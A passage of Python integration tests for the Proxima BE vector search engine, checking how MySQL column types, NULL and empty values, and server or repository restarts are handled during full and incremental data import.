        self.assertEqual(documents[i-1].primary_key, i + 1)
        self.assertEqual(documents[i-1].score, i * i)
        self.assertEqual(documents[i-1].forward_column_values['f1'], '2021-01-1' + str(i + 2))
        self.assertEqual(documents[i-1].forward_column_values['f2'], '13:00:0%d.9' %(i + 1))
        self.assertEqual(documents[i-1].forward_column_values['f3'], '2021-01-1%d 13:00:0%d.123' % (i + 2, i + 1))
        self.assertEqual(documents[i-1].forward_column_values['f4'], '2021-01-1%d 13:00:00.123456' % (i + 2))
        self.assertEqual(documents[i-1].forward_column_values['f6'], '2021')
def test_forward_with_char_and_varchar(self):
    """char/varchar forward columns must survive both the full-table scan and
    the incremental (binlog) ingestion path."""
    collection_name = 'test_forward_with_char_and_varchar'

    def verify_documents(expected_total):
        # query and check every document's char/varchar forward values
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i in range(0, expected_total):
            self.assertEqual(documents[i].primary_key, i + 1)
            self.assertEqual(documents[i].score, i * i)
            self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
            self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4))
            self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
            self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))

    # prepare full table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_with_char_and_varchar_full.sql')
    self.assertEqual(ret, 0)
    # create collection
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    time.sleep(5)
    verify_documents(4)
    # prepare increment table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_with_char_and_varchar_inc.sql')
    self.assertEqual(ret, 0)
    time.sleep(6)
    verify_documents(6)
def test_forward_with_text(self):
    """text-typed forward columns must survive both the full-table scan and
    the incremental (binlog) ingestion path."""
    collection_name = 'test_forward_with_text'

    def verify_documents(expected_total):
        # query and check every document's text forward values
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i in range(0, expected_total):
            self.assertEqual(documents[i].primary_key, i + 1)
            self.assertEqual(documents[i].score, i * i)
            self.assertEqual(documents[i].forward_column_values['f1'], (str(i + 1) * 16))
            self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4))
            self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3))
            self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257))

    # prepare full table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_with_text_full.sql')
    self.assertEqual(ret, 0)
    # create collection
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    time.sleep(5)
    verify_documents(4)
    # prepare increment table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_with_text_inc.sql')
    self.assertEqual(ret, 0)
    time.sleep(6)
    verify_documents(6)
def test_forward_with_text_gbk(self):
    """text forward columns containing GBK/Chinese characters must round-trip
    through both the full-table scan and the incremental ingestion path."""
    collection_name = 'test_forward_with_text_gbk'

    def verify_documents(expected_total):
        # query and check every document's non-ASCII text forward values
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i in range(0, expected_total):
            self.assertEqual(documents[i].primary_key, i + 1)
            self.assertEqual(documents[i].score, i * i)
            self.assertEqual(documents[i].forward_column_values['f1'], ('我是向量检索引擎'))
            self.assertEqual(documents[i].forward_column_values['f2'], (str(i + 1) * 4 + '你'))
            self.assertEqual(documents[i].forward_column_values['f3'], (str(i + 1) * 3 + '你'))
            self.assertEqual(documents[i].forward_column_values['f4'], (str(i + 1) * 257 + '你'))

    # prepare full table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_with_text_gbk_full.sql')
    self.assertEqual(ret, 0)
    # create collection
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    time.sleep(5)
    verify_documents(4)
    # prepare increment table data
    ret = self.mysql_client.execute_batch_sql('data/test_forward_with_text_gbk_inc.sql')
    self.assertEqual(ret, 0)
    time.sleep(6)
    verify_documents(6)
def test_forward_with_blob(self):
    """BLOB forward columns round-trip as raw bytes through full and incremental import."""
    collection_name = 'test_forward_with_blob'

    def verify(expected_total):
        # Query and check primary key, score and all four BLOB forwards per document.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(doc.score, i * i)
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], ('\xf1\xf2\xf3\xf4').encode('ISO-8859-1'))
            self.assertEqual(fwd['f2'], (str(i + 1) * 4).encode('utf-8'))
            self.assertEqual(fwd['f3'], (str(i + 1) * 3).encode('utf-8'))
            self.assertEqual(fwd['f4'], (str(i + 1) * 257).encode('utf-8'))

    # Full stage: load base rows, create the collection, wait for the import.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_blob_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4)
    # Incremental stage: append rows and re-check.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_blob_inc.sql'), 0)
    time.sleep(6)
    verify(6)
def test_forward_with_blob_gbk(self):
    """BLOB forward columns holding GBK-encoded text survive full and incremental import."""
    collection_name = 'test_forward_with_blob_gbk'

    def verify(expected_total):
        # Query and compare every document against its expected GBK byte payloads.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(doc.score, i * i)
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], ('我').encode('gbk'))
            self.assertEqual(fwd['f2'], ('你' + str(i + 1) * 4).encode('gbk'))
            self.assertEqual(fwd['f3'], (str(i + 1) * 3).encode('gbk'))
            self.assertEqual(fwd['f4'], (str(i + 1) * 257).encode('gbk'))

    # Full stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_blob_gbk_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_blob_gbk_inc.sql'), 0)
    time.sleep(6)
    verify(6)
def test_forward_with_bit(self):
    """BIT forward columns of various widths are returned as integers."""
    collection_name = 'test_forward_with_bit'

    def verify(expected_total):
        # Query and compare each document's integer forward values.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(doc.score, i * i)
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], i)
            self.assertEqual(fwd['f2'], i + 128)
            self.assertEqual(fwd['f3'], i + 65535)
            self.assertEqual(fwd['f4'], i + 5000000000)

    # Full stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_bit_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(3)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_bit_inc.sql'), 0)
    time.sleep(6)
    verify(6)
def test_forward_with_binary_and_varbinary(self):
    """BINARY (zero-padded) and VARBINARY forward columns round-trip as bytes."""
    collection_name = 'test_forward_with_binary_and_varbinary'

    def verify(expected_total):
        # Query and compare each document's binary payloads, including
        # the NUL padding that fixed-width BINARY columns carry.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(doc.score, i * i)
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], ('\xf1' + '\x00' * 15).encode('ISO-8859-1'))
            self.assertEqual(fwd['f2'], (str(i + 1) * 4 + '\x00' * 60).encode('utf-8'))
            self.assertEqual(fwd['f3'], ('\xf1' * 3).encode('ISO-8859-1'))
            self.assertEqual(fwd['f4'], (str(i + 1) * 257).encode('utf-8'))

    # Full stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_binary_and_varbinary_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_binary_and_varbinary_inc.sql'), 0)
    time.sleep(6)
    verify(6)
def test_forward_with_set_and_enum(self):
    """SET and ENUM forward columns are returned as their numeric representations."""
    collection_name = 'test_forward_with_set_and_enum'

    def verify(expected_total):
        # Query and compare each document's SET bitmask / ENUM ordinal values.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(doc.score, i * i)
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], (1 << i) + 128)
            self.assertEqual(fwd['f2'], 1 << i)
            self.assertEqual(fwd['f3'], i + 1)
            self.assertEqual(fwd['f4'], i + 1)

    # Full stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_set_and_enum_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_set_and_enum_inc.sql'), 0)
    time.sleep(6)
    verify(6)
def test_forward_with_json(self):
    """String forward columns alongside a JSON column survive full and incremental import."""
    collection_name = 'test_forward_with_json'

    def verify(expected_total):
        # Query and compare document payloads. The 'f2' (JSON) column was
        # left unchecked in the original test and is still skipped here.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(doc.score, i * i)
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], str(i + 1) * 16)
            self.assertEqual(fwd['f3'], str(i + 1) * 3)
            self.assertEqual(fwd['f4'], str(i + 1) * 257)

    # Full stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_json_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_json_inc.sql'), 0)
    time.sleep(6)
    verify(6)
def test_forward_with_geometry(self):
    """String forward columns alongside a geometry column survive full and incremental import."""
    collection_name = 'test_forward_with_geometry'

    def verify(expected_total):
        # Query and compare document payloads. The 'f2' (geometry) column was
        # left unchecked in the original test and is still skipped here.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(doc.score, i * i)
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], str(i + 1) * 16)
            self.assertEqual(fwd['f3'], str(i + 1) * 3)
            self.assertEqual(fwd['f4'], str(i + 1) * 257)

    # Full stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_geometry_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_geometry_inc.sql'), 0)
    time.sleep(6)
    verify(6)
def test_forward_with_decimal(self):
    """DECIMAL forward columns are returned as their exact string representation."""
    collection_name = 'test_forward_with_decimal'

    def verify(expected_total):
        # Query and compare document payloads; 'f2' carries the DECIMAL value
        # rendered as a string, so no precision is lost in transport.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(doc.score, i * i)
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], str(i + 1) * 16)
            self.assertEqual(fwd['f2'], '12345.%d123456789' % (i))
            self.assertEqual(fwd['f3'], str(i + 1) * 3)
            self.assertEqual(fwd['f4'], str(i + 1) * 257)

    # Full stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_decimal_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                forward_columns=['f1', 'f2', 'f3', 'f4'],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_decimal_inc.sql'), 0)
    time.sleep(6)
    verify(6)
def test_forward_with_types_null(self):
    """NULL values across many forward column types do not break import or query."""
    collection_name = 'test_forward_with_types_null'

    def verify(expected_total, offset, log_status=False):
        # Query on index column 'f20' and check the surviving documents.
        # 'offset' is the primary key of the first expected document; the
        # incremental stage shifts keys by one relative to the full stage.
        status, response = self.query(collection_name, column_name='f20')
        if log_status:
            logging.info("query status: %s", status)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + offset)
            self.assertEqual(doc.score, (i + offset - 1) * (i + offset - 1))
            self.assertEqual(doc.forward_column_values['f1'], str(i + offset) * 16)

    # Full stage: nineteen forward columns, vector index on 'f20'.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_types_null_full.sql'), 0)
    forward_columns = ['f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10',
                       'f11', 'f12', 'f13', 'f14', 'f15', 'f16', 'f17', 'f18', 'f19']
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["f20"],
                                forward_columns=forward_columns,
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4, 1, log_status=True)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_types_null_inc.sql'), 0)
    time.sleep(6)
    verify(7, 2)
def test_forward_with_empty_value(self):
    """Empty ('' / zero) forward values are preserved across many column types."""
    collection_name = 'test_forward_with_empty_value'

    def verify(expected_total, offset):
        # Query on index column 'f20' and verify the empty payloads.
        # 'offset' is the primary key of the first expected document; the
        # incremental stage shifts keys by one relative to the full stage.
        status, response = self.query(collection_name, column_name='f20')
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), expected_total)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + offset)
            self.assertEqual(doc.score, (i + offset - 1) * (i + offset - 1))
            fwd = doc.forward_column_values
            self.assertEqual(fwd['f1'], str(i + offset) * 16)
            self.assertEqual(fwd['f2'], "")
            self.assertEqual(fwd['f3'], "")
            self.assertEqual(fwd['f10'], "")
            self.assertEqual(fwd['f11'], "")
            self.assertEqual(fwd['f12'].decode("utf-8"), "")
            self.assertEqual(fwd['f13'], 0)
            # f14 is a fixed-width binary column, so "empty" means all-NUL padding.
            self.assertEqual(fwd['f14'].decode("utf-8"),
                             "\x00\x00\x00\x00\x00\x00\x00\x00")
            self.assertEqual(fwd['f15'].decode("utf-8"), "")
            self.assertEqual(fwd['f16'], 0)

    # Full stage: nineteen forward columns, vector index on 'f20'.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_empty_value_full.sql'), 0)
    forward_columns = ['f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10',
                       'f11', 'f12', 'f13', 'f14', 'f15', 'f16', 'f17', 'f18', 'f19']
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["f20"],
                                forward_columns=forward_columns,
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    verify(4, 1)
    # Incremental stage.
    self.assertEqual(
        self.mysql_client.execute_batch_sql('data/test_forward_with_empty_value_inc.sql'), 0)
    time.sleep(6)
    verify(7, 2)
def test_repository_restart(self):
    """MySQL repository restarts must not lose, duplicate or replay documents.

    Scenario:
      1. Full import of 2 rows; verify documents and that the LSN reached 2.
      2. Stop the repo, add 2 more "full" rows, restart; verify the repo
         catches up (4 docs, LSN 4).
      3. Apply incremental rows; verify 6 docs (LSN observed unchanged at 4).
      4. Restart the repo again, apply a second incremental batch; verify
         7 docs (LSN still observed at 4).
    """

    def verify_documents(count):
        # Query the collection and check the document list against `count`
        # expected rows, including the forward column payloads.
        status, response = self.query(collection_name)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        self.assertEqual(len(documents), count)
        for i in range(0, count):
            self.assertEqual(documents[i].primary_key, i + 1)
            self.assertEqual(documents[i].score, i * i)
            self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
                                   11.111 + i, delta=0.000001)
            self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))

    # prepare full table data
    ret = self.mysql_client.execute_batch_sql('data/test_repository_restart_full.sql')
    self.assertEqual(ret, 0)
    # create collection
    collection_name = 'test_repository_restart'
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                index_dimensions=[16])
    status = self.client.create_collection(schema)
    self.assertEqual(status.code, 0)
    time.sleep(5)
    verify_documents(2)
    # get latest lsn
    latest_lsn = self.get_latest_lsn(collection_name)
    self.assertEqual(latest_lsn.lsn, 2)
    # stop mysql repo, load more rows while it is down, then restart
    self.server_utils.stop_mysql_repo()
    ret = self.mysql_client.execute_batch_sql('data/test_repository_restart_full_1.sql')
    self.assertEqual(ret, 0)
    self.server_utils.start_mysql_repo()
    time.sleep(5)
    verify_documents(4)
    latest_lsn = self.get_latest_lsn(collection_name)
    self.assertEqual(latest_lsn.lsn, 4)
    # prepare increment table data
    ret = self.mysql_client.execute_batch_sql('data/test_repository_restart_inc.sql')
    self.assertEqual(ret, 0)
    time.sleep(6)
    # BUGFIX: the length assertion was missing here in the original test, so a
    # short result list surfaced as an IndexError inside verify_documents
    # instead of a clean assertion failure; verify_documents now always checks it.
    verify_documents(6)
    latest_lsn = self.get_latest_lsn(collection_name)
    self.assertEqual(latest_lsn.lsn, 4)
    # restart mysql repository and apply a second incremental batch
    self.server_utils.stop_mysql_repo()
    time.sleep(2)
    self.server_utils.start_mysql_repo()
    ret = self.mysql_client.execute_batch_sql('data/test_repository_restart_inc_1.sql')
    self.assertEqual(ret, 0)
    time.sleep(6)
    verify_documents(7)
    latest_lsn = self.get_latest_lsn(collection_name)
    self.assertEqual(latest_lsn.lsn, 4)
def test_proxima_be_restart_with_collection_empty(self):
    """A proxima BE restart right after collection creation (no data yet) recovers cleanly."""
    # Load metadata only, then create the collection.
    self.assertEqual(
        self.mysql_client.execute_batch_sql(
            'data/test_proxima_be_restart_with_collection_empty_meta.sql'), 0)
    collection_name = 'test_proxima_be_restart_with_collection_empty'
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    # Bounce the server while the collection is still empty.
    self.server_utils.stop_proxima_be()
    self.server_utils.start_proxima_be()
    time.sleep(5)
    # Feed full data, then incremental data, after the restart.
    self.assertEqual(
        self.mysql_client.execute_batch_sql(
            'data/test_proxima_be_restart_with_collection_empty_full.sql'), 0)
    time.sleep(5)
    self.assertEqual(
        self.mysql_client.execute_batch_sql(
            'data/test_proxima_be_restart_with_collection_empty_inc.sql'), 0)
    time.sleep(3)
    # Verify the documents that arrived post-restart.
    status, response = self.query(collection_name)
    self.assertTrue(status.ok())
    logging.info("query result: %s", response)
    results = response.results
    self.assertEqual(len(results), 1)
    documents = results[0]
    self.assertEqual(len(documents), 2)
    for i, doc in enumerate(documents):
        self.assertEqual(doc.primary_key, i + 1)
        self.assertEqual(doc.score, i * i)
        self.assertAlmostEqual(doc.forward_column_values['col_a'],
                               11.111 + i, delta=0.000001)
        self.assertEqual(doc.forward_column_values['col_b'], 100 * (i + 1))
    # Verify the persisted LSN and its context fields.
    latest_lsn = self.get_latest_lsn(collection_name)
    self.assertEqual(latest_lsn.lsn, 2)
    fields = latest_lsn.context.split(';')
    self.assertEqual(len(fields), 4)
    self.assertEqual(fields[3].strip(), '1')
def test_proxima_be_restart_with_full_stage(self):
    """Restarting proxima BE mid way through the full-import stage loses no documents."""
    self.assertEqual(
        self.mysql_client.execute_batch_sql(
            'data/test_proxima_be_restart_with_full_stage_full.sql'), 0)
    collection_name = 'test_proxima_be_restart_with_full_stage'
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    # Give the full import a moment to start, then bounce the server
    # while it is still in flight.
    time.sleep(1)
    self.server_utils.stop_proxima_be()
    self.server_utils.start_proxima_be()
    time.sleep(5)
    # Poll until all documents are visible: keep waiting while the count
    # is still growing; once it stalls (or reaches the target) assert the
    # final state, so a stuck import fails fast instead of looping forever.
    expected = 10000
    prev_count = 0
    while True:
        status, response = self.query(collection_name, topk=10000)
        self.assertTrue(status.ok())
        logging.info("query result: %s", response)
        results = response.results
        self.assertEqual(len(results), 1)
        documents = results[0]
        logging.info("actual: %d, prev: %d", len(documents), prev_count)
        if prev_count < len(documents) < expected:
            prev_count = len(documents)
            time.sleep(10)
            continue
        self.assertEqual(len(documents), expected)
        for i, doc in enumerate(documents):
            self.assertEqual(doc.primary_key, i + 1)
            self.assertEqual(len(doc.forward_column_values), 2)
        break
def test_proxima_be_restart_with_inc_stage(self):
    """Restarting proxima BE during the incremental stage loses no documents."""
    collection_name = 'test_proxima_be_restart_with_inc_stage'

    def wait_for(expected, retry_sleep, log_progress):
        # Poll until `expected` documents are visible: keep waiting while
        # the count is still growing; once it stalls (or hits the target)
        # assert the final state and check every document.
        prev_count = 0
        while True:
            status, response = self.query(collection_name, topk=10000)
            self.assertTrue(status.ok())
            logging.info("query result: %s", response)
            results = response.results
            self.assertEqual(len(results), 1)
            documents = results[0]
            if log_progress:
                logging.info("actual: %d, prev: %d", len(documents), prev_count)
            if prev_count < len(documents) < expected:
                prev_count = len(documents)
                time.sleep(retry_sleep)
                continue
            self.assertEqual(len(documents), expected)
            for i, doc in enumerate(documents):
                self.assertEqual(doc.primary_key, i + 1)
                self.assertEqual(len(doc.forward_column_values), 2)
            break

    # Full stage, then a first incremental batch.
    self.assertEqual(
        self.mysql_client.execute_batch_sql(
            'data/test_proxima_be_restart_with_inc_stage_full.sql'), 0)
    schema = self.create_schema(collection_name,
                                repository_table=collection_name,
                                index_columns=["column1"],
                                index_dimensions=[16])
    self.assertEqual(self.client.create_collection(schema).code, 0)
    time.sleep(5)
    self.assertEqual(
        self.mysql_client.execute_batch_sql(
            'data/test_proxima_be_restart_with_inc_stage_inc_1.sql'), 0)
    time.sleep(5)
    wait_for(400, 5, True)
    # Bounce the server, then stream a second incremental batch.
    self.server_utils.stop_proxima_be()
    self.server_utils.start_proxima_be()
    time.sleep(5)
    self.assertEqual(
        self.mysql_client.execute_batch_sql(
            'data/test_proxima_be_restart_with_inc_stage_inc_2.sql'), 0)
    time.sleep(5)
    wait_for(2610, 10, False)
# def test_update_collection(self):
# # prepare full table data
# ret = self.mysql_client.execute_batch_sql('data/test_update_collection_full.sql')
# self.assertEqual(ret, 0)
# # create collection
# collection_name = 'test_update_collection'
# schema = self.create_schema(collection_name,
# repository_table=collection_name,
# index_columns=["column1"],
# index_dimensions=[16])
# status = self.client.create_collection(schema)
# self.assertEqual(status.code, 0)
# collection_meta = data["collection"]
# time.sleep(5)
# # query result
# status, response = self.query(collection_name)
# self.assertTrue(status.ok())
# logging.info("query result: %s", response)
# results = response.results
# self.assertEqual(len(results), 1)
# documents = results[0]
# count = 2
# self.assertEqual(len(documents), count)
# for i in range(0, count):
# self.assertEqual(documents[i].primary_key, i + 1)
# self.assertEqual(documents[i].score, i * i)
# self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
# 11.111 + i, delta=0.000001)
# self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# # get latest lsn
# latest_lsn = self.get_latest_lsn(collection_name)
# self.assertEqual(latest_lsn.lsn, 2)
# # suspend collection
# status = self.client.suspend_collection(collection_name)
# logging.info("suspend collection result: %s", data)
# self.assertEqual(status.code, 0)
# # prepare table data
# ret = self.mysql_client.execute_batch_sql('data/test_update_collection_inc.sql')
# self.assertEqual(ret, 0)
# time.sleep(3)
# # update schema
# self.creator.update_schema(schema, collection_meta)
# status = self.client.update_collection(schema)
# logging.info("update schema: %s", schema)
# logging.info("update result: %s", data)
# self.assertEqual(status.code, 0)
# # resume collection
# status = self.client.resume_collection(collection_name)
# logging.info("resume collection result: %s", data)
# self.assertEqual(status.code, 0)
# time.sleep(5)
# # query result
# status, response = self.query(collection_name)
# self.assertTrue(status.ok())
# logging.info("query result: %s", response)
# results = response.results
# self.assertEqual(len(results), 1)
# documents = results[0]
# count = 4
# self.assertEqual(len(documents), count)
# for i in range(0, count):
# self.assertEqual(documents[i].primary_key, i + 1)
# self.assertEqual(documents[i].score, i * i)
# self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
# 11.111 + i, delta=0.000001)
# self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# # get latest lsn
# latest_lsn = self.get_latest_lsn(collection_name)
# self.assertEqual(latest_lsn.lsn, 4)
def test_collection_create_and_remove(self):
# create collection
collection_name = 'test_collection_create_and_remove'
schema = self.create_schema(collection_name,
repository_table=collection_name,
index_columns=["column1"],
index_dimensions=[16])
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
# send data
ret = self.mysql_client.execute_batch_sql('data/test_collection_create_and_remove_full.sql')
self.assertEqual(ret, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
self.assertEqual(len(results), 1)
documents = results[0]
count = 2
self.assertEqual(len(documents), count)
for i in range(0, count):
self.assertEqual(documents[i].primary_key, i + 1)
self.assertEqual(documents[i].score, i * i)
self.assertAlmostEqual(documents[i].forward_column_values['col_a'],
11.111 + i, delta=0.000001)
self.assertEqual(documents[i].forward_column_values['col_b'], 100 * (i + 1))
# remove the collection
status = self.client.drop_collection(collection_name)
self.assertEqual(status.code, 0)
time.sleep(2)
# recreate the collection
status = self.client.create_collection(schema)
self.assertEqual(status.code, 0)
time.sleep(5)
# query result
status, response = self.query(collection_name)
self.assertTrue(status.ok())
logging.info("query result: %s", response)
results = response.results
